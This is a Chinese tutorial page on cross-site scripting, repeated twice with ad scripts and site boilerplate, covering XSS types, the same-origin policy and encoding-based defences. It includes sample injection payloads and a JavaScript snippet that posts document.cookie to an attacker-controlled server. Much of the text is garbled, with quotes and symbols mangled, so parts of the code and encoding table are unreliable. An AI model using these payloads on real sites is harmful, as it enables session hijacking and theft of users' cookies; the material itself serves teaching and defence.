跨站脚本攻击（XSS）的原理、防范和处理方法
&0。关键字：，跨站脚本攻击，原理分析，攻击方式，防范，检查，恶意代码，蠕虫
以下概念摘抄自百度百科：
又叫CSS (Cross Site Script) ，跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码，当用户浏览该页之时，嵌入其中Web里面的html代码会被执行，从而达到恶意攻击用户的特殊目的。
2。生效方式
1）构造URL
攻击者通过构造URL的方式构造了一个有问题的页面；当其他人点击了此页面后，会发现页面出错，或者被暗中执行了某些js脚本，这时，攻击行为才真正生效。
一般来说，动态页面中会将url中的部分内容回写在页面中。以百度的搜索为例：
/s?wd=&script&alert(&wrong&)&%2Fscript&
参数&script&alert(&wrong&)&%2Fscript&是&script&alert(&wrong&)&/script&转义后的结果，搜索结果页中，会在标题中中和搜索框中回写用户输入的内容。从页面的源代码中，我们看到，这两处本应该显示用户输入内容&script&alert(&wrong&)&/script&的地方，实际也经过了转义处理，变成了&script&alert(&wrong&)&/script&。如果这里没有经过转义处理，则页面中就嵌入了一段script，会执行，并弹出对话框提示用户。如果是其他恶意代码，则可能造成破坏。
然后攻击者将此URL广为传播&&比如说，以报错的方式发给百度的管理员，管理员打开这个URL就中招了。
2）发布内容式
构造URL攻击方式传播范围有限，被攻击者只要有基本的安全意识就可以避免，因此这种手段的危险性比较小。相比之下，通过发表内容构造的的危害就大了很多。
在可以发表内容的论坛、讨论区、吧、博客、微博等网站上，用户发表的内容会保存起来，允许其他用户浏览。这些保存的内容显示在页面上的时候，如果没有经过正确的处理，也会把攻击者精心构造的内容显示出来，访问该内容的用户就此中招。如果该页面流传广泛，则影响会更加深远。
一般来说，这种攻击都做得比较隐蔽，被攻击者并不知道自己什么时候踩中了地雷；网站也很难追查问题的来源。
上述两种方式的流传范围都有一定限度；最彻底最暴力的方式是使用蠕虫&&就是首先发一个有问题的文章，浏览者阅读时会被暗中执行恶意代码，发表一篇新的文章的，该文章也含有同样的恶意代码。这样有可能在最快时间内将攻击铺满整个网站。蠕虫式攻击将暗中偷偷摸摸的攻击行为变成了光明正大的攻城拔寨，极容易被发现和修复。
下面是6月28日新浪微博被蠕虫攻击的报告，其实质就是攻击。
【声明】:黑吧安全网()登载此文出于传递更多信息之目的，并不代表本站赞同其观点和对其真实性负责，仅适于网络安全技术爱好者学习研究使用，学习中请遵循国家相关法律法规。如有问题请联系我们，联系邮箱，我们会在最短的时间内进行处理。
上一篇：【】【】如何防止跨站点脚本攻击
跨站点脚本(XSS)是当前web应用中最危险和最普遍的漏洞之一。安全研究人员在大部分最受欢迎的网站,包括Google, Facebook, Amazon, PayPal等网站都发现这个漏洞。如果你密切关注bug赏金计划,会发现报道最多的问题属于XSS。为了避免跨站脚本,浏览器也有自己的过滤器,但安全研究人员总是能够设法绕过这些过滤器。
这种漏洞(XSS)通常用于发动cookie窃取、恶意软件传播(蠕虫攻击),会话劫持,恶意重定向。在这种攻击中,攻击者将恶意JavaScript代码注入到网站页面中,这样&受害&者的浏览器就会执行攻击者编写的恶意脚本。这种漏洞容易找到，但很难修补。这就是为什么你可以在任何网站发现它的身影。
在这篇文章中,我们将看到跨站脚本攻击是什么以及如何创建一个过滤器来阻止它。我们还将看到几个开源库,将帮助你修补在web应用程序中的跨站脚本漏洞。
2. 跨站点脚本是什么？
跨站点脚本攻击是一种Web应用程序的攻击，攻击者尝试注入恶意脚本代码到受信任的网站上执行恶意操作。 在跨站点脚本攻击中，恶意代码在受影响用户的浏览器端执行，并对用户的影响。也被称为XSS攻击。你可能有一个疑问就是为什么我们叫它&XSS&，而不是&CSS&。
对于广大的web程序猿来说。在网页设计中，我们已经把级联样式表叫做CSS。因此为了避免混淆，我们把cross-site scripting称为XSS。
现在，让我们回到XSS攻击。这个漏洞发生在网站应用程序接收用户的输入数据却没有做必要的编码。如果对用户输入的数据没有进行正确的编码和过滤，这个被注入恶意脚本将被发送给其他用户。 对浏览器来说，它没有办法知道它不应该相信一个脚本的合法性。浏览器会正常地把这个脚本当成普通脚本执行，这个时候恶意的操作就不可避免的发生了。大部分的时候，XSS是用来窃取cookie，或窃取有效用户的会话令牌session，以此进行会话劫持。
3. XSS的演示
Example 1:
几乎所有的网站上看到一个搜索框。有了这个搜索框，你可以搜索并找到在网站上存放的资料。这种搜索形式看起来像这样
&form action=&search.php& method=&get&&
&input type=&text& name=&q& value=&& /&
&input type=&submit& value=&send& /&
在search.php页面中，代码显示了搜索的结果，并且列出了用户输入的搜索关键字。形式如下:
&Search results for Keyword&或者&You Searched for Keyword&
search.php可以这么写来模拟功能:
&h3&You Searched for: &?php echo($_GET['q']); ?&
无论你输入任何关键字，它将随搜索结果一起被显示在网页上。现在想想会发生什么，如果一个攻击者试图从这个地方注入以下恶意脚本。
&script&alert('XSS injection')&/script&
可以看到，因为缺少对用户输入的有效的&编码&和&过滤&。导致了XSS攻击的发生，其实从本质上理解，XSS就是一种HTML的注入，和传统的buffer overflow是类似的思想，即没有对数据和代码进行有效的分离，在缓冲区溢出总，攻击者在通过超长的数据包发送覆盖了程序buffer的关键返回ret位置，导致CPU控制流的劫持，错误地把攻击者数据当作代码来执行，最后导致了缓冲区溢出。
而XSS中的HTML注入也是一种利用代码和数据未有效分离的攻击，只不过攻击发生在受害者用户的浏览器上，攻击者将数据发送给服务器，服务器没有对输入的数据进行有效的&编码&和&过滤&(即去除数据本身的代码特性，对于HTML来说就是去除它们称为Tag标签的可能)，导致了这些数据在用户的浏览器上得到执行，最终导致XSS攻击的发生。
Example 2:
很多网站都有私信或者留言板功能。登录用户可以发表评论或者给其他用户(包括管理员)发送私信。一个最简单的模拟表单如下:
&form action=&sendmessage.php& method=&post'&&
&textarea name=&message&& &/textarea&
&input type=&submit& value=&send& /&
当用户点击发送时，这条消息会被保存在数据库中指定的数据表中，另一个用户当打开这条消息的时候将看到发送的内容。但是，如果一个恶意攻击者发送的内容包含了一些javascript代码，这些代码用于偷取敏感的cookie信息。当用户打开看到这条消息的时候，恶意的javascript代码就会得到执行，造成敏感cookie信息泄漏。攻击者可以利用获得这些cookie信息进行session hijacking会话劫持，直接以合法用户的身份登录其他用户的账户。
恶意攻击者可以在消息框中加入一下javascript代码:
var url = &/index.php&;
//攻击者控制的服务器
var postStr = &ck=& + document.
var ajax =
if(window.XMLHttpRequest())
ajax = new XMLHttpRequest();
else if(window.ActiveXObject)
ajax = new ActiveXObject(&Microsoft.XMLHttp&);
ajax.open(&POST&, url, true);
ajax.setRequestHeader(&Content-Type&, &application/x-www-form-urlencoded&);
ajax.send(postStr);
ajax.onreadystatechange = function()
if(ajax.readyState == 4 && ajax.status == 200)
//alert(&Done!&);
通过AJAX异步请求，将被攻击者的敏感cookie信息发送给了攻击者控制的服务器。攻击者随后即可利用这些cookie信息以&合法&用户的身份进行登录操作。
这里首先要理清楚几个重要的问题:
1. cookie的作用
Cookie，有时也用其复数形式Cookies，指某些网站为了辨别用户身份、进行session跟踪而储存在用户本地终端上的数据（通常经过加密）。定义于RFC2109（已废弃），最新取代的规范是RFC2965。
也就是说，cookie是用户和服务器之间的桥梁。服务器可以使用session来保存用户的身份信息(ID,购物车等)，但是需要用户在访问网页(发送HTTP数据包)的时候附带上相应的cookie，通过cookie中的特定值来识别sessionID，才能把单独用户和单独的session联系起来。cookie是有状态HTTP交互的一种重要机制。
2. 浏览器的同源策略
在进行cookie窃取的时候，攻击者偷取的cookie是什么，是全部cookie，还是当前这个网站的cookie？要解决这个问题，我们要先了解一些浏览器的同源策略。
同源策略，它是由Netscape提出的一个著名的安全策略。
现在所有支持JavaScript 的浏览器都会使用这个策略。
所谓同源是指，域名，协议，端口相同。
当一个浏览器的两个tab页中分别打开来 百度和谷歌的页面
当浏览器的百度tab页执行一个脚本的时候会检查这个脚本是属于哪个页面的，
即检查是否同源，只有和百度同源的脚本才会被执行。
同源策略(Same Origin Policy)是一种约定，它是浏览器最核心也是最基本的安全功能，如果缺少了同源策略，则浏览器的正常功能可能都会受到影响。可以说web是构建在同源策略的基础之上的，浏览器只是针对同源策略的一种实现。
浏览器的同源策略限制了来自不同源的&document&或脚本，对当前&document&的读取或者设置某些属性。为了不让浏览器的页面行为发生混乱，浏览器提出了&Origin&(源)这以概念，来自不同的Origin的对象无法互相干扰。
因为同源策略的原因，也就导致了我们的XSS Payload(XSS攻击代码)必须在我们希望攻击的同一个域下触发。例如攻击者如果想窃取在下的cookie，那就必须在这个域(可以是不同页面，但要保证是同一个域)下的的某一个页面放置XSS代码，可以是存储型，也可以是反射型或DOM Baesd型的。
4. XSS攻击的种类
对XSS的分类没有明确的标准，但业界普遍将XSS攻击分为三类。反射型XSS(non-persistent XSS), 存储型XSS(persistent XSS), DOM Based XSS
4.1 非持久性跨站点脚本攻击
非持久性XSS也称为反射型跨站漏洞。它是最常见的类型的XSS。漏洞产生的原因是攻击者注入的数据反映在响应中。如果你看了我们上面所示的例子,第一个例子是一个非持久的XSS攻击。一个典型的非持久性XSS包含一个带XSS攻击向量的链接(即每次攻击需要用户的点击)。
4.2 持久的跨站点脚本攻击
持久型跨站点脚本也称为存储跨站点脚本。它一般发生在XSS攻击向量(一般指XSS攻击代码)存储在网站数据库，当一个页面被用户打开的时候执行。每当用户打开浏览器,脚本执行。在上面的示例中,第二个例子就展示了一个持久的XSS攻击。持久的XSS相比非持久性XSS攻击危害性更大,因为每当用户打开页面，查看内容时脚本将自动执行。谷歌的orkut曾经就遭受到XSS。
4.3 基于dom的跨站点脚本攻击
基于DOM的XSS有时也称为type0 XSS。当用户能够通过交互修改浏览器页面中的DOM(Document Object Model)并显示在浏览器上时，就有可能产生这种漏洞，从效果上来说它也是反射型XSS。
通过修改页面的DOM节点形成的XSS，称之为DOM Based XSS。
function test()
var str = document.getElementById(&text&).
document.getElementById(&t&).innerHTML = &&a href='& + str + &' &testLink&/a&&;
&div id=&t&&&/div&
&input type=&text& id=&text& value=&& /&
&input type=&button& id=&s& value=&write& onclick=&test()& /&
在这个场景中，代码修改了页面的DOM节点，通过innerHTML把一段用户数据当作HTML写入到页面中，这就造成了DOM Based XSS
' onclick=alert(/xss/) '
输入后，页面代码就变成了:
&a href='' onclick=alert(/xss/) '' &testLink&/a&
点击这个新生成的链接，脚本将被执行。
实际上，这里还有另外一种利用方式&除了构造一个新事件外，还可以选择闭合掉&a&标签，并插入一个新的HTML标签:
'&&img src=# onerror=alert(/xss2/) /&&'
页面代码变成了:
&a href=''&&img src=# onerror=alert(/xss2/) /&&'' &testLink&/a&
5. XSS漏洞产生的原因
跨站点脚本的主要原因是程序猿对用户的信任。开发人员轻松地认为用户永远不会试图执行什么出格的事情,所以他们创建应用程序,却没有使用任何额外的代码来过滤用户输入以阻止任何恶意活动。另一个原因是,这种攻击有许多变体，用制造出一种行之有效的XSS过滤器是一件比较困难的事情。
但是这只是相对的，对用户输入数据的&编码&和&过滤&在任何时候都是很重要的，我们必须采取一些针对性的手段对其进行防御。
6. 如何创造一个良好的XSS过滤器来阻止大多数XSS攻击代码
6.1 需要重点&编码&和&过滤&的对象
HTTP referrer objects
GET parameters from a form
POST parameters from a form
Window.location
Document.referrer
document.location
document.URL
document.URLUnencoded
cookie data
headers data
database data
防御XSS有一个原则:
以当前的应用系统为中心，所有的进入应用系统的数据都看成是输入数据(包括从FORM表单或者从数据库获取到的数据)，所有从当前应用系统流出的数据都看作是输出(包括输出到用户浏览器或向数据库写入数据)
对输入的数据进行&过滤&，对输出数据进行&编码&。这里的&编码&也要注意，必须针对数据具体的上下文语境进行针对性的编码。例如数据是输出到HTML中的那就要进行HtmlEncode，如果数据是输出到javascript代码中进行拼接的，那就要进行javascriptEncode。
如果不搞清楚数据具体输出的语境，就有可能因为HtmlParser()和javascriptParser()两种解析引擎的执行先后问题导致看似严密的&编码&形同虚设。
6.2 HtmlEncode HTML编码
它的作用是将字符转换成HTMLEntities，对应的标准是ISO-8859-1
为了对抗XSS，在HtmlEncode中要求至少转换以下字符:
&&& --&&& &
&&& --&&& &
&&& --&&& &
&&& --&&& &
'&& --&&& '
/&& --&&& /
htmlentities
.cn/php/func_string_htmlentities.asp
htmlspecialchars
.cn/php/func_string_htmlspecialchars.asp
6.3 javascriptEncode javascript&编码&
javascriptEncode与HtmlEncode的编码方法不同，HtmlEncode是去编码，而javascriptEncode更多的像转义，它需要使用&\&对特殊字符进行转义。从原理上来讲，这都符合编码函数的一个大原则: 将数据和代码区分开，因为对于HTML Tag来说，我们对其进行&可视化(转换成可以见字符)&的编码可以将数据和HTML的界限分开。而对于javascript来说，我们除了要进行编码之外，还需要对特殊字符进行转义，这样攻击输入的用于&闭合&的特殊字符就无法发挥作用，从而避免XSS攻击，除此之外，在对抗XSS时，还要求输出的变量必须在引号内部，以避免造成安全问题。
.cn/js/jsref_escape.asp
该方法不会对 ASCII 字母和数字进行编码，也不会对下面这些 ASCII 标点符号进行编码： * @ & _ + . / 。其他所有的字符都会被转义序列(十六进制\xHH)替换。
利用这个编码函数，不仅能防御XSS攻击，还可以防御一些command注入。
7. 一些开源的防御XSS攻击的代码库
PHP AntiXSS
这是一个不错的PHP库,可以帮助开发人员增加一层保护，防止跨站脚本漏洞。
/p/php-antixss/
xss_clean.php filter
/mbijon/1098477
HTML Purifier
http://htmlpurifier.org/
xssprotect
/p/xssprotect/
XSS HTML Filter
http://finn-no.github.io/xss-html-filter/
[&译自&] from：/articles/web/15188.html
(window.slotbydup=window.slotbydup || []).push({
id: '2467140',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467141',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467142',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467143',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467148',
container: s,
size: '1000,90',
display: 'inlay-fix'如何防止跨站点脚本攻击_百度知道比特客户端
您的位置：
详解大数据
详解大数据
详解大数据
详解大数据
了解如何防止跨站点脚本攻击
关键字：XSS 应用安全 站点脚本
　　1. 简介
　　跨站点脚本(XSS)是当前web应用中最危险和最普遍的漏洞之一。研究人员在大部分最受欢迎的网站,包括,, Amazon,等网站都发现这个漏洞。如果你关注bug赏金计划,会发现报道最多的问题属于XSS。为了避免跨站脚本,也有自己的过滤器,但安全研究人员总是能够设法绕过这些过滤器。
　　这种漏洞(XSS)通常用于发动cookie窃取、恶意软件传播(攻击),会话劫持,恶意重定向。在这种攻击中,攻击者将恶意JavaScript代码注入到网站页面中,这样”受害”者的浏览器就会执行攻击者编写的恶意脚本。这种漏洞容易找到，但很难修补。这就是为什么你可以在任何网站发现它的身影。
　　在这篇文章中,我们将看到跨站脚本攻击是什么以及如何创建一个过滤器来阻止它。我们还将看到几个开源库,将帮助你修补在web应用程序中的跨站脚本漏洞。
　　2. 跨站点脚本是什么?
　　跨站点脚本攻击是一种Web应用程序的攻击，攻击者尝试注入恶意脚本代码到受信任的网站上执行恶意操作。 在跨站点脚本攻击中，在受影响用户的浏览器端执行，并对用户的影响。也被称为XSS攻击。你可能有一个疑问就是为什么我们叫它”XSS”，而不是””。
　　对于广大的web程序猿来说。在网页设计中，我们已经把级联样式表叫做CSS。因此为了避免混淆，我们把cross- scripting称为XSS。
　　现在，让我们回到XSS攻击。这个漏洞发生在网站应用程序接收用户的输入却没有做必要的编码。如果对用户输入的数据没有进行正确的编码和过滤，这个被注入恶意脚本将被发其他用户。 对浏览器来说，它没有办法知道它不应该相信一个脚本的合法性。浏览器会正常地把这个脚本当成普通脚本执行，这个时候恶意的操作就不可避免的发生了。大部分的时候，XSS是用来窃取cookie，或窃取有效用户的会话令牌，以此进行会话劫持。
　　3. XSS的演示
　　Example 1:
　　几乎所有的网站上看到一个搜索框。有了这个搜索框，你可以搜索并找到在网站上存放的资料。这种搜索形式看起来像这样
　　在search.php页面中，代码显示了搜索的结果，并且列出了用户输入的搜索关键字。形式如下:
　　“Search results for Keyword”或者”You Searched for Keyword”
　　search.php可以这么写来模拟功能:
　　You Searched for:
　　无论你输入任何关键字，它将随搜索结果一起被显示在网页上。现在想想会发生什么，如果一个攻击者试图从这个地方注入以下恶意脚本。
　　可以看到，因为缺少对用户输入的有效的”编码”和”过滤”。导致了XSS攻击的发生，其实从本质上理解，XSS就是一种HTML的注入，和传统的buffer overflow是类似的思想，即没有对数据和代码进行有效的分离，在缓冲区溢出总，攻击者在通过超长的数据包发送覆盖了程序buffer的关键返回ret位置，导致CPU控制流的劫持，错误地把攻击者数据当作代码来执行，最后导致了缓冲区溢出。
　　而XSS中的HTML注入也是一种利用代码和数据未有效分离的攻击，只不过攻击发生在受害者用户的浏览器上，攻击者将数据发送给，服务器没有对输入的数据进行有效的”编码”和”过滤”(即去除数据本身的代码特性，对于HTML来说就是去除它们称为Tag标签的可能)，导致了这些数据在用户的浏览器上得到执行，最终导致XSS攻击的发生。
　　Example 2:
　　很多网站都有私信或者留言板功能。登录用户可以发表评论或者给其他用户(包括管理员)发送私信。一个最简单的模拟表单如下:
　　当用户点击发送时，这条消息会被保存在中指定的数据表中，另一个用户当打开这条消息的时候将看到发送的内容。但是，如果一个恶意攻击者发送的内容包含了一些javascript代码，这些代码用于偷取敏感的cookie。当用户打开看到这条消息的时候，恶意的javascript代码就会得到执行，造成敏感cookie信息泄漏。攻击者可以利用获得这些cookie信息进行session hijacking会话劫持，直接以合法用户的身份登录其他用户的账户。
　　恶意攻击者可以在消息框中加入一下javascript代码:
　　var url = "/index.php"; //攻击者控制的服务器
　　var postStr = "ck=" + document.
　　var ajax =
　　if(window.XMLHttpRequest())
　　ajax = new XMLHttpRequest();
　　else if(window.ActiveXObject)
　　ajax = new ActiveXObject(".XMLHttp");
　　ajax.open("POST", url, true);
　　ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
　　ajax.send(postStr);
　　ajax.onreadystatechange = function()
　　if(ajax.readyState == 4 &&ajax.status == 200)
　　//alert("Done!");
　　通过AJAX异步请求，将被攻击者的敏感cookie信息发送给了攻击者控制的服务器。攻击者随后即可利用这些cookie信息以”合法”用户的身份进行登录操作。
　　这里首先要理清楚几个重要的问题:
　　1. cookie的作用
　　Cookie，有时也用其复数形式Cookies，指某些网站为了辨别用户身份、进行session跟踪而储存在用户本地终端上的数据(通常经过加密)。定义于RFC2109(已废弃)，最新取代的规范是RFC2965。
　　也就是说，cookie是用户和服务器之间的桥梁。服务器可以使用session来保存用户的身份信息(ID,购物车等)，但是需要用户在访问网页(发送HTTP数据包)的时候附带上相应的cookie，通过cookie中的特定值来识别sessionID，才能把单独用户和单独的session联系起来。cookie是有状态HTTP交互的一种重要机制。
　　2. 浏览器的同源策略
　　在进行cookie窃取的时候，攻击者偷取的cookie是什么，是全部cookie，还是当前这个网站的cookie?要解决这个问题，我们要先了解一些浏览器的同源策略。
　　同源策略，它是由Netscape提出的一个著名的安全策略。
　　现在所有支持JavaScript 的浏览器都会使用这个策略。
　　所谓同源是指，，协议，端口相同。
　　当一个浏览器的两个tab页中分别打开来和的页面
　　当浏览器的百度tab页执行一个脚本的时候会检查这个脚本是属于哪个页面的，
　　即检查是否同源，只有和百度同源的脚本才会被执行。
　　同源策略(Same Origin Policy)是一种，它是浏览器最核心也是最基本的安全功能，如果缺少了同源策略，则浏览器的正常功能可能都会受到影响。可以说web是构建在同源策略的基础之上的，浏览器只是针对同源策略的一种实现。
　　浏览器的同源策略限制了来自不同源的”document”或脚本，对当前”document”的读取或者设置某些属性。为了不让浏览器的页面行为发生混乱，浏览器提出了”Origin”(源)这以概念，来自不同的Origin的对象无法互扰。
　　因为同源策略的原因，也就导致了我们的XSS Payload(XSS攻击代码)必须在我们希望攻击的同一个域下触发。例如攻击者如果想窃取在下的cookie，那就必须在这个域(可以是不同页面，但要保证是同一个域)下的的某一个页面放置XSS代码，可以是型，也可以是反射型或DOM Baesd型的。
　　4. XSS攻击的种类
　　对XSS的分类没有明确的标准，但业界普遍将XSS攻击分为三类。反射型XSS(non-persistent XSS), 存储型XSS(persistent XSS), DOM Based XSS
　　4.1 非持久性跨站点脚本攻击
　　非持久性XSS也称为反射型跨站漏洞。它是最常见的类型的XSS。漏洞产生的原因是攻击者注入的数据反映在响应中。如果你看了我们上面所示的例子,第一个例子是一个非持久的XSS攻击。一个典型的非持久性XSS包含一个带XSS攻击向量的链接(即每次攻击需要用户的点击)。
　　4.2 持久的跨站点脚本攻击
　　持久型跨站点脚本也称为存储跨站点脚本。它一般发生在XSS攻击向量(一般指XSS攻击代码)存储在网站数据库，当一个页面被用户打开的时候执行。每当用户打开浏览器,脚本执行。在上面的示例中,第二个例子就展示了一个持久的XSS攻击。持久的XSS相比非持久性XSS攻击危害性更大,因为每当用户打开页面，查看内容时脚本将自动执行。谷歌的orkut曾经就遭受到XSS。
　　4.3 基于dom的跨站点脚本攻击
　　基于DOM的XSS有时也称为type0 XSS。当用户能够通过交互修改浏览器页面中的DOM(Document Object Model)并显示在浏览器上时，就有可能产生这种漏洞，从效果上来说它也是反射型XSS。
　　通过修改页面的DOM节点形成的XSS，称之为DOM Based XSS。
　　在这个场景中，代码修改了页面的DOM节点，通过innerHTML把一段用户数据当作HTML写入到页面中，这就造成了DOM Based XSS
　　' onclick=alert(/xss/) '
　　输入后，页面代码就变成了:
　　testLink
　　点击这个新生成的链接，脚本将被执行。
　　实际上，这里还有另外一种利用方式―除了构造一个新事件外，还可以选择闭合掉标签，并插入一个新的HTML标签:
　　5. XSS漏洞产生的原因
　　跨站点脚本的主要原因是程序猿对用户的信任。开发人员轻松地认为用户永远不会试图执行什么出格的事情,所以他们创建应用程序,却没有使用任何额外的代码来过滤用户输入以阻止任何恶意活动。另一个原因是,这种攻击有许多变体，用制造出一种行之有效的XSS过滤器是一件比较困难的事情。
　　但是这只是相对的，对用户输入数据的”编码”和”过滤”在任何时候都是很重要的，我们必须采取一些针对性的手段对其进行防御。
　　6. 如何创造一个良好的XSS过滤器来阻止大多数XSS攻击代码
　　6.1 需要重点”编码”和”过滤”的对象
　　The URL
　　HTTP referrer objects
　　GET parameters from a form
　　POST parameters from a form
　　Window.location
　　Document.referrer
　　document.location
　　document.URL
　　document.URLUnencoded
　　cookie data
　　headers data
　　database data
　　防御XSS有一个原则:
　　以当前的应用系统为中心，所有的进入应用系统的数据都看成是输入数据(包括从FORM表单或者从数据库获取到的数据)，所有从当前应用系统流出的数据都看作是输出(包括输出到用户浏览器或向数据库写入数据)
　　对输入的数据进行”过滤”，对输出数据进行”编码”。这里的”编码”也要注意，必须针对数据具体的上下文语境进行针对性的编码。例如数据是输出到HTML中的那就要进行HtmlEncode，如果数据是输出到javascript代码中进行拼接的，那就要进行javascriptEncode。
　　如果不搞清楚数据具体输出的语境，就有可能因为HtmlParser()和javascriptParser()两种解析引擎的执行先后问题导致看似严密的”编码”形同虚设。
　　6.2 HtmlEncode HTML编码
　　它的作用是将字符转换成HTMLEntities，对应的标准是-8859-1
　　为了对抗XSS，在HtmlEncode中要求至少转换以下字符:
　　&--& &
　　& --&&
　　& --& &
　　" --& "
　　' --& '
　　/ --& /
　　在PHP中:
　　htmlentities
　　.cn/php/func_string_htmlentities.asp
　　htmlspecialchars
　　.cn/php/func_string_htmlspecialchars.asp
　　6.3 javascriptEncode javascript”编码”
　　javascriptEncode与HtmlEncode的编码方法不同，HtmlEncode是去编码，而javascriptEncode更多的像转义，它需要使用”\”对特殊字符进行转义。从原理上来讲，这都符合编码函数的一个大原则: 将数据和代码区分开，因为对于HTML Tag来说，我们对其进行”可视化(转换成可以见字符)”的编码可以将数据和HTML的界限分开。而对于javascript来说，我们除了要进行编码之外，还需要对特殊字符进行转义，这样攻击输入的用于”闭合”的特殊字符就无法发挥作用，从而避免XSS攻击，除此之外，在对抗XSS时，还要求输出的变量必须在引号内部，以避免造成安全问题。
　　escape()
　　.cn/js/jsref_escape.asp
　　该方法不会对 ASCII 字母和数字进行编码，也不会对下面这些 ASCII 标点符号进行编码： * @ C _ + . / 。其他所有的字符都会被转义序列(十六进制\xHH)替换。
　　利用这个编码函数，不仅能防御XSS攻击，还可以防御一些command注入。
　　7. 一些开源的防御XSS攻击的代码库
　　PHP AntiXSS
　　这是一个不错的PHP库,可以帮助开发人员增加一层保护，防止跨站脚本漏洞。
　　/p/php-antixss/
　　xss_clean.php filter
　　/mbijon/1098477
　　HTML Purifier
　　http://htmlpurifier.org/
　　xssprotect
　　/p/xssprotect/
　　XSS HTML Filter
[ 责任编辑：小石潭记 ]
去年，手机江湖里的竞争格局还是…
甲骨文的云战略已经完成第一阶段…
软件信息化周刊
比特软件信息化周刊提供以数据库、操作系统和管理软件为重点的全面软件信息化产业热点、应用方案推荐、实用技巧分享等。以最新的软件资讯，最新的软件技巧，最新的软件与服务业内动态来为IT用户找到软捷径。
商务办公周刊
比特商务周刊是一个及行业资讯、深度分析、企业导购等为一体的综合性周刊。其中，与中国计量科学研究院合力打造的比特实验室可以为商业用户提供最权威的采购指南。是企业用户不可缺少的智选周刊！
比特网络周刊向企业网管员以及网络技术和产品使用者提供关于网络产业动态、技术热点、组网、建网、网络管理、网络运维等最新技术和实用技巧，帮助网管答疑解惑，成为网管好帮手。
服务器周刊
比特服务器周刊作为比特网的重点频道之一，主要关注x86服务器，RISC架构服务器以及高性能计算机行业的产品及发展动态。通过最独到的编辑观点和业界动态分析，让您第一时间了解服务器行业的趋势。
比特存储周刊长期以来，为读者提供企业存储领域高质量的原创内容，及时、全面的资讯、技术、方案以及案例文章，力求成为业界领先的存储媒体。比特存储周刊始终致力于用户的企业信息化建设、存储业务、数据保护与容灾构建以及数据管理部署等方面服务。
比特安全周刊通过专业的信息安全内容建设，为企业级用户打造最具商业价值的信息沟通平台，并为安全厂商提供多层面、多维度的媒体宣传手段。与其他同类网站信息安全内容相比，比特安全周刊运作模式更加独立，对信息安全界的动态新闻更新更快。
新闻中心热点推荐
新闻中心以独特视角精选一周内最具影响力的行业重大事件或圈内精彩故事，为企业级用户打造重点突出，可读性强，商业价值高的信息共享平台；同时为互联网、IT业界及通信厂商提供一条精准快捷，渗透力强，覆盖面广的媒体传播途径。
云计算周刊
比特云计算周刊关注云计算产业热点技术应用与趋势发展，全方位报道云计算领域最新动态。为用户与企业架设起沟通交流平台。包括IaaS、PaaS、SaaS各种不同的服务类型以及相关的安全与管理内容介绍。
CIO俱乐部周刊
比特CIO俱乐部周刊以大量高端CIO沙龙或专题研讨会以及对明星CIO的深入采访为依托，汇聚中国500强CIO的集体智慧。旨为中国杰出的CIO提供一个良好的互融互通 、促进交流的平台，并持续提供丰富的资讯和服务，探讨信息化建设，推动中国信息化发展引领CIO未来职业发展。
IT专家新闻邮件长期以来，以定向、分众、整合的商业模式，为企业IT专业人士以及IT系统采购决策者提供高质量的原创内容，包括IT新闻、评论、专家答疑、技巧和白皮书。此外，IT专家网还为读者提供包括咨询、社区、论坛、线下会议、读者沙龙等多种服务。
X周刊是一份IT人的技术娱乐周刊，给用户实时传递I最新T资讯、IT段子、技术技巧、畅销书籍，同时用户还能参与我们推荐的互动游戏，给广大的IT技术人士忙碌工作之余带来轻松休闲一刻。
微信扫一扫
关注Chinabyte